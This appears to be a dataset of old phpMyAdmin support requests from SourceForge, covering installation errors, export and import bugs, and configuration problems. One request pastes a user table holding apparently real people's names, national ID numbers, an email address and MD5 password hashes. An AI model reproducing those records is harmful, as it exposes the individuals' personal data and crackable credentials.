I copied this same installation of phpmyadmin over to another test server running easyphp 1.8 which includes apache 1.3.33, mysql 4.1.9 and php 4.3.10) and it displayed perfectly.
Does php5 have a problem properly display phpmyadmin?
Thanks for your help, Jonathan Original URL https sourceforge.net p phpmyadmin support requests 988 https sourceforge.net p phpmyadmin support requests 988 Original author amdrulz22 Found in version Latest Git","bug"
"24444","2765","Wrong path to themes darkblue orange img error.ico.
Something is maybe hardcoded or badcoded, that forces phpMyAdmin to look for themes darkblue orange img error.ico, and that results in a 404 not found when phpMyAdmin is not installed in the root path of the given url p.e.
inside the folder phpmyadmin http localhost phpMyAdmin ).
I personally fixed the problem with an alias in Apache to avoid such 404 in my logs), but this is a bug.
Original URL https sourceforge.net p phpmyadmin support requests 939 https sourceforge.net p phpmyadmin support requests 939 Original author galeza Found in version 2.8.2","bug"
"24444","2766","Copy Table Broken.
Operations Copy Database generates problematic SQL when trying to create a table.
The last part of the SQL says ENGINE = MYISAM AUTO INCREMENT = 1683DEFAULT CHARSET = latin1 Note, the lack of space between 1683 and DEFAULT.
Original URL https sourceforge.net p phpmyadmin support requests 941 https sourceforge.net p phpmyadmin support requests 941 Original author memelab","bug"
"24444","2767","getting 404 error when manipulating data.
when clicking on any link that alters information in the database of any sort i recieve 404 error.
Looked in documentation, tried what it said, P.S.
documentation instructions were horrible, can you add a few more details on what to do and where to do it, taht would be great!
So, stuck with a phpmyadmin that doesnt work.
Original URL https sourceforge.net p phpmyadmin support requests 991 https sourceforge.net p phpmyadmin support requests 991 Original author akravemaster","bug"
"24444","2768","Apache SegFault after upgrade to php 5.1.5.
Just upgraded to php 5.1.5, afterwards phpMyAdmin Apache SegFaults in certain areas.
I am unsure if this is an issue with phpMyAdmin, or PHP though figured would get the info out regardless.
System Information RedHat Enterprise Linux 3 update 8 phpMyAdmin 2.8.2.2 php 5.1.5 The following is the trace of the faulty process getcwd usr local phpMyAdmin 2.8.2.2 , 4096) = 30 time NULL) = 1155879644 lstat64 usr , \{st mode=S IFDIR|0755, st size=4096, ...\}) = 0 lstat64 usr local , \{st mode=S IFDIR|0755, st size=4096, ...\}) = 0 lstat64 usr local phpMyAdmin 2.8.2.2 , \{st mode=S IFDIR|0755, st size=4096, ...\}) = 0 lstat64 usr local phpMyAdmin 2.8.2.2 libraries , \{st mode=S IFDIR| 0755, st size=4096, ...\}) = 0 lstat64 usr local phpMyAdmin 2.8.2.2 libraries relation.lib.php , \{st mode=S IFREG|0644, st size=34304, ...\}) = 0 open usr local phpMyAdmin 2.8.2.2 libraries relation.lib.php , O RDONLY) = 32 fstat64 32, \{st mode=S IFREG|0644, st size=34304, ...\}) = 0 lseek 32, 0, SEEK CUR) = 0 read 32, lt;?php\n Id relation.lib.php,v ..., 8192) = 8192 read 32, echo \ lt;tr gt; lt;th align=\ left\ gt; ..., 8192) = 8192 read 32, oreach GLOBALS[\ information sc ..., 8192) = 8192 read 32, = \\\ \ .
PMA sqlAddslashes db) ..., 8192) = 8192 read 32, y ), \ id content\ = gt; array ));\n\n ..., 8192) = 1536 read 32, , 8192) = 0 read 32, , 8192) = 0 close 32) = 0 SIGSEGV Segmentation fault) 0 0) chdir etc httpd ) = 0 rt sigaction SIGSEGV, \{SIG DFL\}, \{SIG DFL\}, 8) = 0 getpid ) = 18874 kill 18874, SIGSEGV) = 0 sigreturn ) = ?
mask now []) SIGSEGV Segmentation fault) 0 0) URL Accessed phpMyAdmin sql.php?
db= lt;DBNAME gt; goto=db details structure.php table= lt;TABLENAME gt; pos=0 Where lt;DBNAME gt; and lt;TABLENAME gt; are replaced appropriately.
The issue does not surface at php 5.1.4.
Any other information necessary can be provided upon request.
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 943 https sourceforge.net p phpmyadmin support requests 943 Original author wdierkes","bug"
"24444","2769","Stored Procedure Not Showing!.
Hi, I am using 2.7.0 pl2 with MySQL 5.0.18 nt on Apache 2.
I noticed that phpmyadmin does not list any stored procedures that I create, even though I am able to use them through my own code.
Is this behavior of phpmyadmin intended?
And if so, are there any plans to add support for Stored Procedures for future versions of phpmyadmin?
Thanks, Pete Original URL https sourceforge.net p phpmyadmin support requests 944 https sourceforge.net p phpmyadmin support requests 944 Original author digioz","bug"
"24444","2770","Problems with require.
Dear phpMyAdmin team, I decided to set up an Apache webserver including php5 and MySQL on my old Windows NT4 computer for development purposes.
The webserver, MySQL and the php support work fine.
phpinfo ) works without any problems.
In order to manage my MySQL databases I tried to install the latest version of phpMyAdmin but I always get this error message when I try to execute setup.php Warning require once .
libraries common.lib.php) [function.require once] failed to open stream No such file or directory in E \Apache2 \htdocs\phpMyAdmin\scripts\setup.php on line 10 Fatal error require once ) [function.require] Failed opening required .
libraries common.lib.php include path= .
;e \php5\pear ) in E \Apache2 \htdocs\phpMyAdmin\scripts\setup.php on line 10 I also tried to create config.inc.php manually.
phpMyAdmin works then but without any styling.
It looks like a text only interface in Times New Roman and it s not very comfortable to use.
I find these error messages in Apache2 s error log [Sun Aug 20 15 40 48 2006] [error] [client 127.0.0.1] PHP Warning require once .
libraries common.lib.php) [ lt;a href= function.require once gt;function.require once lt; a gt;] failed to open stream No such file or directory in E \\Apache2 \\htdocs\\phpMyAdmin\\scripts\\setup.php on line 10 [Sun Aug 20 15 40 48 2006] [error] [client 127.0.0.1] PHP Fatal error require once ) [ lt;a href= function.require gt;function.require lt; a gt;] Failed opening required .
libraries common.lib.php include path= .
;e \\php5\\pear ) in E \\Apache2 \\htdocs\\phpMyAdmin\\scripts\\setup.php on line 10 These are the paths Apache is located in e \apache2 PHP5 is located in e \php5 MySQL is located in e \mysql50 What s the problem?
I m getting crazy with that errors... ;) Thank you!
cargu Original URL https sourceforge.net p phpmyadmin support requests 945 https sourceforge.net p phpmyadmin support requests 945 Original author cargu Found in version 2.8.2.2","bug"
"24444","2771","No edit delete icons when browsing records.
We ve been using phpMyAdmin without problems for a few years now, but yesterday for no apparent reason we began seeing buggy results when browsing records in tables.
Normally, the check box, pencil icon b edit.png) for editing, and the X icon b drop.png) for deletion appear as the first three rows of every column in the table display.
Now those rows no longer appear, which makes it impossible to edit or delete individual records.
Also, the fields within each record are displaying right aligned rather than left aligned.
I m attaching a screenshot that shows the problem.)
We were running phpMyAdmin version 2.7.0 pl2 when this problem began occurring, but it is also happening with clean installed versions 2.6.4 pl4 and 2.8.2.2.
However, it is NOT happening when we run phpMyAdmin from a different server and access the same MySQL database.
We re running PHP 4.3.10 apache), with MySQL .1.15 log, on a dedicated FreeBSD server hosted by Pair Networks.
Original URL https sourceforge.net p phpmyadmin support requests 946 https sourceforge.net p phpmyadmin support requests 946 Original author sheldonrampton Found in version 2.8.2.2","bug"
"24444","2772","Left hand frame duplicated.
The left hand frame of the window is being duplicated, leading to three frames across the screen See the attached screen grab).
This is easy to reproduce 1\.
Log in to phpMyAdmin and select a database.
2\.
Browse a table.
3\.
Edit one row and click Go no need to change any column values.
The screen reverts after clicking the home icon.
We re running PHP version 4.4.2 under Apache on an AIX box, if that s relevant.
Original URL https sourceforge.net p phpmyadmin support requests 947 https sourceforge.net p phpmyadmin support requests 947 Original author jacklevy Found in version 2.8.2","bug"
"24444","2773","Browse result count off by one.
It seems that whenever using Browse to view results the count is off by one Showing rows 0 29 197 total, Query took 0.0768 sec ).
Rows with 1 result show Showing rows 0 0 1 total... Looks like there s a problem at line 1747 of libraries display tbl.lib.php.
Original URL https sourceforge.net p phpmyadmin support requests 948 https sourceforge.net p phpmyadmin support requests 948 Original author ibennetch Found in version Latest Git","bug"
"24444","2774","Error when copying DBs containing views.
The following error occurs when copying an entire DB that contains a view CREATE ALGORITHM = UNDEFINEDDEFINER = `dbak`.`mm anon search view` `localhost` SQL SECURITY DEFINER VIEW `dbname`.`mm anon search view` AS SELECT `mm`.`nid` AS `nid` , `mm`.`mmtid` AS `mmtid` , `r`.`uid` AS `uid` FROM `dbname`.`mm node2tree` `mm` JOIN `dbname`.`mm read perm` `r` ) WHERE `mm`.`mmtid` = `r`.`mmtid` ) MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near UNDEFINEDDEFINER = `dbak`.`mm anon search view` `localhost` SQL SECURITY DEF at line 1 When I export just this view, I get the following.
Note the missing space above in UNDEFINEDDEFINER CREATE ALGORITHM=UNDEFINED DEFINER=`root` `localhost` SQL SECURITY DEFINER VIEW `mm anon search view` AS select `mm`.`nid` AS `nid`,`mm`.`mmtid` AS `mmtid`,`r`.`uid` AS `uid` from `mm node2tree` `mm` join `mm read perm` `r`) where `mm`.`mmtid` = `r`.`mmtid`); I am using MySQL 5.0.22 and PHP 5.1.4.
Original URL https sourceforge.net p phpmyadmin support requests 949 https sourceforge.net p phpmyadmin support requests 949 Original author gribnif","bug"
"24444","2775","Ignore auto increment checkbox.
Ixc2xb4m using PHP 5.1.6, Apache 2.0.59, MySQL 5.0.24 max, and when I try to export even if the auto increment value checkbox is not checked the auto increment value apears in the MyISAM tables, but in the InnoDB itxc2xb4s not.
When it is checked the value is exported for all tables.
I just tried in MyISAM and InnoDB) Not sure this is a phpMyAdmin bug or a MySQL...
Original URL https sourceforge.net p phpmyadmin support requests 950 https sourceforge.net p phpmyadmin support requests 950 Original author nsfiregun","bug"
"24444","2776","1046 No Database Selected with subquery.
PMA phpMyAdmin 2.6.1 DB MySQL 4.1.7 standard log OS CentOS 3.5 This query works fine SELECT DISTINCT retroid, retroteamid FROM relievers but using that query in a subquery SELECT FROM SELECT DISTINCT retroid, retroteamid FROM relievers )x yields 1046 No database selected The breadcrumb on the page read dump.php) shows the correct server and database names, but the table name is the alias of the subquery.
My guess is that the parser thinks the alias is a table, can t find the table within the database, and halts.
I get this error from the DB level SQL form, the table level SQL form, and the popup window.
This query works when I run it from the MySQL command line.
Original URL https sourceforge.net p phpmyadmin support requests 951 https sourceforge.net p phpmyadmin support requests 951 Original author jimpoz Found in version 2.6.1","bug"
"24444","2777","Problem adding privileges when db has underscore in name.
If a database name has an underscore ) in it then the generated SQL is incorrect.
Using MySQL 4.1.20 community nt.
The underscore is escaped, and therefore the name the privileges are applied to is wrong.
eg db name test db Add a new user with full access to test db GRANT ALL PRIVILEGES ON `test\ db` .
TO test user WITH GRANT OPTION ; The db test\ db does not exist, so the user privileges do not apply.
PMA does track that test\ db is meant to be the same as test db, so shows the privileges correctly, but MySQL does not care.
Also, the name test\ db is displayed in various drop downs, but should really be displayed as just test db.
Thanks, Cameron.
Original URL https sourceforge.net p phpmyadmin support requests 953 https sourceforge.net p phpmyadmin support requests 953 Original author macrosnz Found in version 2.8.2.1","bug"
"24444","2778","500 ERROR with Apache 2.2.3 php 5.1.6 FCGI).
while run with PHP FAST CGI, it return 500 errors.
here is the httpd.conf about PHP fastcgi LoadModule ScriptAlias fcgi php5 usr bin FastCgiServer usr bin php processes 3 AddType application x httpd fastphp5 .php Action application x httpd fastphp5 fcgi php5 php Here is the error log [Fri Sep 08 05 49 23 2006] [info] Initial No.1) HTTPS request received for child 0 server pma.fbi.hk 443) [Fri Sep 08 05 49 23 2006] [error] [client xxx.xxx.xxx.xxx] FastCGI comm with server usr bin php aborted error parsing headers duplicate header status [Fri Sep 08 05 49 23 2006] [info] [client xxx.xxx.xxx.xxx] Connection closed to child 0 with unclean shutdown server fbi.hk 443) This ONLY apears on phpMyAdmin, others PHP program is fine to run just like BBS, horde, squirrelmail.
how to fix it??
Original URL https sourceforge.net p phpmyadmin support requests 954 https sourceforge.net p phpmyadmin support requests 954 Original author bbghost","bug"
"24444","2779","Redirect to Wikipedia after UPDATE.
After updating some datasets I always be redirected to http de.wikipedia.org wiki Var D C3 A9partement).
I donxc2xb4t know why and I CANxc2xb4T go backward.
It directly redirects me to wikipedia again.
The datasets will be updated!
Original URL https sourceforge.net p phpmyadmin support requests 955 https sourceforge.net p phpmyadmin support requests 955 Original author freq9","bug"
"24444","2780","UTF 8 data treated as iso 8859 1 ?)
on SQL export.
The database contents a phpBB2 forum) are UTF 8.
When exporting as SQL, data is treated as being in some not sure which one) monolingual encoding so it gets encoded again and, of course, is unsuitable for import afterwards.
There is no such problems when exporting via phpBB2.
PhpMyAdmin is installed site wide by my hosting provider so I couldn t experiment with configuration so far.
Could you please suggest which part is broken?
Original URL https sourceforge.net p phpmyadmin support requests 956 https sourceforge.net p phpmyadmin support requests 956 Original author tburba Found in version 2.8.2.2","bug"
"24444","2781","PHP error thrown when trying to delete a row.
When trying to delete a row using phpMyAdmin, the following error occurs Fatal error Call to undefined function pma dbi try query ) in home .sites 28 site1 web phpadmin libraries check user privileges.lib.php on line 16 The steps to replicate this error are as follows... 1\.
Create a table with two int 11) columns.
2\.
Insert three rows with 0 for both entries.
3\.
Try to assign an 2 column index on the two columns.
4\.
Browse 5\.
Click the red X to delete a row 6\.
Error page results This was done using the root user.
Original URL https sourceforge.net p phpmyadmin support requests 957 https sourceforge.net p phpmyadmin support requests 957 Original author nathanmickler","bug"
"24444","2782","Mysql Error no 1251 Client does not support authentication.
Hi I am using mysql 5 and phpmyadmin version 2.9 rc1.
I have entered the root user name and pass in the config.inc.php file however I am getting this error.
I have used and installed phpmyadmin before however only on mysql4.1 i think and it worked.
I tried using phpmyadmin 2.8 which I used to use before but I got the same error so I downloaded phpmyadmin 2.9.
Please can someone tell me what is wrong.
Thanks Error MySQL said 1251 Client does not support authentication protocol requested by server; consider upgrading MySQL client Original URL https sourceforge.net p phpmyadmin support requests 958 https sourceforge.net p phpmyadmin support requests 958 Original author playjam99","bug"
"24444","2783","Exported Data not correct case.
I have tried this on phpmyadmin 2.7 gt; 2.9.0 rc1 on windows xp.
Happens when exporting a database as SQL.
The correct table name is `clientContacts` but when trying to create the table, the name changes to `clientcontacts`.
Create seems to be the only place this is happening in the generated SQL.
Extract from generated SQL Table structure for table `clientContacts` CREATE TABLE `clientcontacts` `clientContactId` int 11) NOT NULL auto increment, `clientId` int 11) NOT NULL default 0 , Dumping data for table `clientContacts` INSERT INTO `clientContacts` `clientContactId`, `clientId`, `contactTitle`, `contactFirstName`, `contactSurname`, `contactSex`, `contactPosition`, Original URL https sourceforge.net p phpmyadmin support requests 959 https sourceforge.net p phpmyadmin support requests 959 Original author ofdan","bug"
"24444","2784","Problem with configuration.
Hello dear .. Just today I upgrade the phpmyadmin from 2.8.2.4 to 2.9.0 and it works great ...
However when I press on phpmyadmin in WHM in the server .. it shows on the bottom right side of the page below logout Invalid hostname for server 2.
Please review your configuration.
Invalid hostname for server 3.
Please review your configuration.
What is wrong dear ?
Original URL https sourceforge.net p phpmyadmin support requests 960 https sourceforge.net p phpmyadmin support requests 960 Original author abuali1981","bug"
"24444","2785","MySql Privilege Table problems.
Hello, First MySql version is not listed on your pull down I am runing version phpMyadmin 2.6.3 pl1 I am having a problem with my phpMyAdmin MySql .. and was just wantting to see if someone could help me out with it or point me in the right direction to fix problem .. My problem is when I go to Privileges section on the main page it is tellign me this Warning Your privilege table structure seem to be older than this MySQL version!
Please run the script mysql fix privilege tables that should be included in your MySQL server distribution to solve this problem!
But I can not find the script for this or not sure what to do to run it ... can someone help me with tis or explain it to me a lil bit...
Thanks for your time and any help you can give me with this problem..
Original URL https sourceforge.net p phpmyadmin support requests 961 https sourceforge.net p phpmyadmin support requests 961 Original author darkestembrace Found in version 2.6.3 rc1","bug"
"24444","2786","Unable to log onto servers other than first one configured..
It seems that it s not possible to log onto servers other than the first one in the config file without first logging onto the first one.
This is problematic especially if, of the listed servers, you don t know the username password to the first one in the list.
Additionally, if you do log onto the first listed server, then log onto one of the other servers, the page that comes up immediately after logon is not the server you just logged into, but the one first in the servers list, and it is necessary to change the server again using the drop down on the post logon page.
Original URL https sourceforge.net p phpmyadmin support requests 1010 https sourceforge.net p phpmyadmin support requests 1010 Original author laconicus","bug"
"24444","2787","Cannot configure PMA PMA token undefined).
Hello, I tried to configurie phpMyAdmin 2.9.0.1 on my Win32 developer machine.
System specs Webserver Apache 2.2.3 PHP 5.1.6 MySQL 5.x and 4.x I called http myhost.local phpmyadmin scripts setup.ph p and the setup script loaded in my browser.
Fine ) But I can click any button I want, nothing happens.
I opened the apache error logs an noticed PHP Notice Undefined index PMA token in U \\Webs\\default\\htdocs\\phpmyadmin\\scripts\\setup.p hp on line 345, referer http myhost.local phpmyadmin scripts setup.php The session is created correctly.
At least a file will be created, something like sess jm8rt9vve5v5c47f94pt17f837 with the content http rafb.net paste results Jfdy5a14.html I don t know if it is an phpMyAdmin or an env problem... Whissi Original URL https sourceforge.net p phpmyadmin support requests 962 https sourceforge.net p phpmyadmin support requests 962 Original author whissi Found in version Latest Git","bug"
"24444","2788","missing quotes on varchar fields during export.
I do not get this error when exporting data under MySQL Administrator, just PHPMyAdmin.
On some fields, the INSERT statement is missing the single quotes around a varchar field.
Here s an example from an export DROP TABLE IF EXISTS `tblBS`; CREATE TABLE IF NOT EXISTS `tblBS` `bs` varchar 1) NOT NULL, `bsdesc` varchar 40) NOT NULL, PRIMARY KEY `bs`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; Dumping data for table `tblBS` INSERT INTO `tblBS` `bs`, `bsdesc`) VALUES B, BUY ), S, SELL ); Note that the VALUES should be B , BUY ), etc This problem happens on other fields too.
I ve changed the encoding type of the field it s latin1 swedish), that didn t help.
I ve tried making changes to the params when the Export runs, that didn t fix it either.
Again, I don t think it is a config issue, as this works correctly in other admin tools.
Email me if I m wrong or you need more info.
Original URL https sourceforge.net p phpmyadmin support requests 963 https sourceforge.net p phpmyadmin support requests 963 Original author jugdish114","bug"
"24444","2789","Access Denied .
Hey, I just got it, and MySQL told me to change the password.
I did and now root localhost is not allowed.
I deleted the root account, so is there a way to fix it?
Thanks Original URL https sourceforge.net p phpmyadmin support requests 964 https sourceforge.net p phpmyadmin support requests 964 Original author lemcoe9","bug"
"24444","2790","ldi table.php missed.
Hi there, in the actual Versions I miss the good old ldi table Import as in V. 2.6.0 pl3 for example.
Imho the actual tbl import.php is really ugly.
It doesn t accept a csv table import if the Fields aren t enclosed by .
It doesn t accept an import if the number of fields aren t exactly the sam as the number of fields in the table.
It prefers a UTF8 encoded file.
and so on ...
I miss the good old Insert data from a textfile Function.
In the older Version it doesn t matter, if the fields are enclosed by or if the number of fields arent the same as in the table.
I just had to create a Tab separated Txt file and to change the field terminator from ; to \t.
All the time it worked perfecly.
Isn t it possible to include the ldi table Import in the newer Versions too ?
Regards, achim2 Original URL https sourceforge.net p phpmyadmin support requests 965 https sourceforge.net p phpmyadmin support requests 965 Original author achim2","bug"
"24444","2791","session support with open basedir restriction broken.
After upgrading to 2.10.0.2 I found out that my open basedir restriction broke phpMyAdmin.
Warning session start ) [function.session start] open basedir restriction in effect.
File var tmp) is not within the allowed path s) usr local www phpMyAdmin) in usr local www phpMyAdmin libraries session.inc.php on line 100 Fatal error session start ) [ lt;a href= function.session start gt;function.session start lt; a gt;] Failed to initialize storage module files path ) in usr local www phpMyAdmin libraries session.inc.php on line 100 apache configuration Alias phpMyAdmin usr local www phpMyAdmin lt;Directory usr local www phpMyAdmin gt; Options Indexes MultiViews AllowOverride None Order allow,deny Allow from all php admin value open basedir usr local www phpMyAdmin lt; Directory gt; I m using auth type http Resolved this by mkdir usr local www phpMyAdmin session chown www usr local www phpMyAdmin session and adding the line php admin value session.save path usr local www phpMyAdmin session to my apache configuration session save path should be configurable in config.php.inc and documented or in FAQ under open basedir restriction FreeBSD 6.2 RELEASE Apache 2.2.4 mod php 5.2.1 3 from ports collection) with Suhosin Patch 0.9.6.2 eAccelerator v0.9.5 Original URL https sourceforge.net p phpmyadmin support requests 1015 https sourceforge.net p phpmyadmin support requests 1015 Original author spil","bug"
"24444","2792","Lost my Database.
Hello good afternoon; When I upgraded my PHP script for my webpage.I lost the database, does the update keep older version of the database, it looks like it created a new version on th DB..... what it looks like we got our selves a new version of the database and we would like to get all the 2000 records that were before the upgrade..... Now it looks like we only see 8 records in the DB.
Doe you have any suggestion?...
please let me know Salman Original URL https sourceforge.net p phpmyadmin support requests 966 https sourceforge.net p phpmyadmin support requests 966 Original author salmankhalek Found in version 2.6.2","bug"
"24444","2793","Load function uploading incorrect characters.
I asked this in the user support forum and they suggested I bring it here.
When using version 2.6.4 pl4 while using the link to Insert data from a textfile into table my data from the CSV file using fractions such as 1xc2xbcxxc2xbe is instead entered with ?
.
On a seperate site with all other configurations the same using version 2.6.1 it is entered correctly.
Both the working and non working versions are set for MySQL charset UTF 8 Unicode utf8) and the field in question is varchar 255) Latin1 swedish ci in both situations.
Original URL https sourceforge.net p phpmyadmin support requests 968 https sourceforge.net p phpmyadmin support requests 968 Original author fasdfsdfsdf Found in version 2.6.4 pl1","bug"
"24444","2794","Apache HTTP Error 401.
Hi there, For some reason, whenever I try using PhpMyAdmin 2.8 or higher may include any version higher than 2.6), I get random Apache HTTP 401 error pages.
Because these error pages have an XML tag at top, and it is request a .php file, firefox seems to want to download the error document.
If I use the lastest 2.6.x release, I dont get this.
I would really like to use the newest release possible, but it simply isn t useable because it takes about 4 5 tries at doing something before the error stops.
Hopefully we can solve this issue.
Regards, Ryan D Original URL https sourceforge.net p phpmyadmin support requests 972 https sourceforge.net p phpmyadmin support requests 972 Original author rdjurovich Found in version 2.8.2.2","bug"
"24444","2795","undefined index phpmyadmin.css.php.
i have hat it since my local webserver works in debug modus line 713 phpmyadmin.css.php background lt;?php echo GLOBALS[ cfg ][ BrowseMarkerBackground ]; ?
gt;; Original URL https sourceforge.net p phpmyadmin support requests 973 https sourceforge.net p phpmyadmin support requests 973 Original author standardcms","bug"
"24444","2796","Export fails with query functions.
Using phpMyAdmin 2.9.0.3 and the export feature seems to fail with query functions such as CONCAT ).
To replicate the issue try the following query SELECT firstname, lastname, CONCAT firstname, , lastname) as name from Members Original URL https sourceforge.net p phpmyadmin support requests 974 https sourceforge.net p phpmyadmin support requests 974 Original author richard lee","bug"
"24444","2797","new rows replace first rows of database.
I wanted to know if there s a limit of how many rows one can add to a database with phpmyadmin?
I have 16000 rows and when I insert new rows they replace the first rows of the database so I lose data... My database uses 1,350kb and shows disc space of only 630b left!
What can I do to prevent this?
Original URL https sourceforge.net p phpmyadmin support requests 976 https sourceforge.net p phpmyadmin support requests 976 Original author littlewind Found in version 2.5.0 rc2","bug"
"24444","2798","DOS line endings in config.sample.inc.php.
config.sample.inc.php is distributed with DOS line endings.
I expected it to have UNIX line endings like the other PHP files in the distribution archive.
Original URL https sourceforge.net p phpmyadmin support requests 977 https sourceforge.net p phpmyadmin support requests 977 Original author ryandesign","bug"
"24444","2799","Field count is empty when creating new table.
After creating a new database I used phpMyAdmin to create a table.
I filled in the table name and number of fields test, 2) and pressed Go.
PhpMyAdmin returned the following error Error MySQL said The field count is empty!
I have triple checked to make sure a value was submitted in the Number of Fields textbox.
This installation of PhpMyAdmin 2.9.1 is on a Windows XP pro system running Apache 2.2, PHP 5.2.0 and MySQL 5.0.27.
Original URL https sourceforge.net p phpmyadmin support requests 978 https sourceforge.net p phpmyadmin support requests 978 Original author astembridge","bug"
"24444","2800","Import impossible ver 2.9.1.
I have installed the PMA version 2.9.1 and tried to do an import using csv.
It s the same bug posted by myself on 2006 10 25 22 43 as [ 1584836 ] ok 2.9.1) Import impossible ver 2.9.0.2 and closed by lem9 on 2006 11 09 09 34.
IT IS STILL IMPOSIBLE TO MAKE THE IMPORT.
===================================================== The Table I m using.
phpMyAdmin SQL Dump version 2.9.1 http www.phpmyadmin.net Host localhost Generation Time Nov 16, 2006 at 01 08 PM Server version 4.1.20 PHP Version 4.4.4 Database `websprog General` Table structure for table `Usuarios` DROP TABLE IF EXISTS `Usuarios`; CREATE TABLE IF NOT EXISTS `Usuarios` `Borrado` char 1) collate latin1 spanish ci NOT NULL default N , `Cedula` int 10) unsigned NOT NULL default 0 , `Identificacion` varchar 20) collate latin1 spanish ci NOT NULL default , `Nombre` varchar 30) collate latin1 spanish ci NOT NULL default , `E Mail` varchar 100) collate latin1 spanish ci NOT NULL default , `Unidad` varchar 10) collate latin1 spanish ci NOT NULL default 0 , `Password` varchar 32) collate latin1 spanish ci NOT NULL default , `Activo` char 1) collate latin1 spanish ci NOT NULL default a , `Pregunta` varchar 100) collate latin1 spanish ci NOT NULL default , `Respuesta` varchar 100) collate latin1 spanish ci NOT NULL default , `Estatus` varchar 10) collate latin1 spanish ci NOT NULL default Confirmar , `Type` varchar 20) collate latin1 spanish ci NOT NULL default , `Inspector` char 1) collate latin1 spanish ci NOT NULL default N , `Despachador` char 1) collate latin1 spanish ci NOT NULL default N , `Operacion` char 1) collate latin1 spanish ci NOT NULL default N , `UsuIngreso` date NOT NULL default 0000 00 00 , `UsuUltAct` date NOT NULL default 0000 00 00 , UNIQUE KEY `Cedula` `Cedula`), UNIQUE KEY `Identificacion` `Identificacion`), KEY `Unidad` `Unidad`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1 spanish ci COMMENT= Cxc3xb3digos y Nombres de Empleados ; =================================================== The IMPORT FILE I m using.
N , 2765119 , rp017 , Rafael Pixc3xb1ango ,, 9010110000 , 34affa1b534fee40d2ea7174ab2647ce , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 3957808 , on003 , Orlando Noriega ,, 9010110000 , f0721206a587882b866485c415c0f253 , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 4549943 , am040 , Alexander Mendoza ,, 9010110000 , bb01c50f4ab959bab36cc3f2c9a944b9 , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 5998320 , mc047 , Miguel Castro ,, 9010110000 , 240265d72a5c6291cd6e689a7f75703b , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 6868688 , ht004 , Henry Tovar ,, 9010110000 , e79719628682207a5fc6791d39d0b4ed , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 9878650 , jc041 , Juan Canella ,, 9010110000 , 2fbc34395c37acadcf1cb3f0b19a634c , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 10937560 , lb018 , Lisandro Bruce ,, 9010110000 , 9552f2d03df916dfd28b040f50b290ec , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 12377503 , jv042 , Jose Vielma ,, 9010110000 , 6b3f521379b056f904c2d55609737771 , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 12572284 , ll026 , Luis Leon ,, 9010110000 , e85143e7725d967fa4f9ced7a1550231 , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 12638953 , ge007 , Gabriel Escalona ,, 9010110000 , ef6299c9e7fdae6d775819ce1e2620b8 , a , N , S , N ,,, Datos , 2005 02 04 13 00 00 , 2005 02 04 13 00 00 N , 12717108 , jc072 , Jose Capote ,, 9010110000 , 97a89b639603c483f269d90f426aabe2 , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 12962723 , rl022 , Rodolfo Lorenzo ,, 9010110000 , 85317ee3de35a72d9ff56cad2df71be3 , a , N , S , N ,,, Datos , 0000 00 00 00 00 00 , 2005 02 04 13 00 00 N , 13992387 , mr085 , Marcel Rodrigo , marcel.rodrigo aes.com , 9010110000 , 557867f482a4b35bc6f6c9f9ee3038e0 , a , N , S , N , Nombre de su Mascota , ninguna , Activo , 0000 00 00 00 00 00 , 2005 08 15 08 37 13 N , 13617815 , jv067 , Johnder Velazco ,, 9010110000 , 06c530184d0766c5370e3c9bc428094f , a , N , S , N ,,, Datos , 2006 07 13 13 48 00 , 2006 07 13 13 48 00 N , 13043422 , aq007 , Alexis Querecuto ,, 9010110000 , 4f35f4b59effcd8aa91ce00cbc02fd64 , a , N , S , N ,,, Datos , 2006 07 13 13 48 00 , 2006 07 13 13 48 00 ================================================= By the way, it doesn t matter if you use comma or semicolon as field separators.
WILL YOU REALLY FIX THIS SOMETIME.
I can t beleive the history of this bug.
It was working with some display problems) as early as version 2.6.0.beta2 It worked also in version 2.6.3.pl1 again with some display problems) Then came that fatal 2.7 series that could not handle the import.
Then it was fixed in version 2.8.0.3.
Then came versions 2.8. series up to todays 2.9.1 in which it s not working again.
Original URL https sourceforge.net p phpmyadmin support requests 979 https sourceforge.net p phpmyadmin support requests 979 Original author yacar suscri","bug"
"24444","2801","2.9.1.1 Missing Parameters despite following FAQ.
Hello, I m getting Missing Parameter errors as described in FAQ 2.8 despite following all the advice there.
cfg[ PmaAbsoluteUri ] is empty http bugs.php.net bug.php?id=31134 doesn t apply I m not using Hardened PHP php.ini directive arg separator.input is ; and output = [I ve double checked that this file is being parsed] Google has turned up nothing.
I ve run out of ideas Your help would be really appreciated, thanks.
XP SP2 Firefox 2 Apache 2.2.3 win32 PHP 5.2.0 A sample URL http localhost phpmyadmin tbl change.php?db=mydb;table=mytable;token=2031403d45ea1cfde0a5ecb24927e50e pos=0 session max rows=30 disp direction=horizontal repeat cells=100 dontlimitchars=0 primary key= 60wp options 60.
60option id 60 3D 6 AND 60wp options 60.
60blog id 60 3D 0 AND CONVERT 28 60wp options 60.
60option name 60 USING utf8 29 3D 27admin email 27 sql query=SELECT 2A FROM 60wp options 60 goto=sql.php Thanks, Dave Original URL https sourceforge.net p phpmyadmin support requests 981 https sourceforge.net p phpmyadmin support requests 981 Original author dpdnolan","bug"
"24444","2802","Yahoo hosting Quirk Paid hosting Quirk.
this is workable yet more of an argrivation than a major bug however I m quite sure this problem is common on many types of Paid hosting.
examlpe.file.php ftp gt; gt; gt; gt; ERORR not allowed example file.php ftp gt; gt; gt; ok then comes the wonderfull part of having to edit each N every file hope this is the English only version Multi lang yikes.
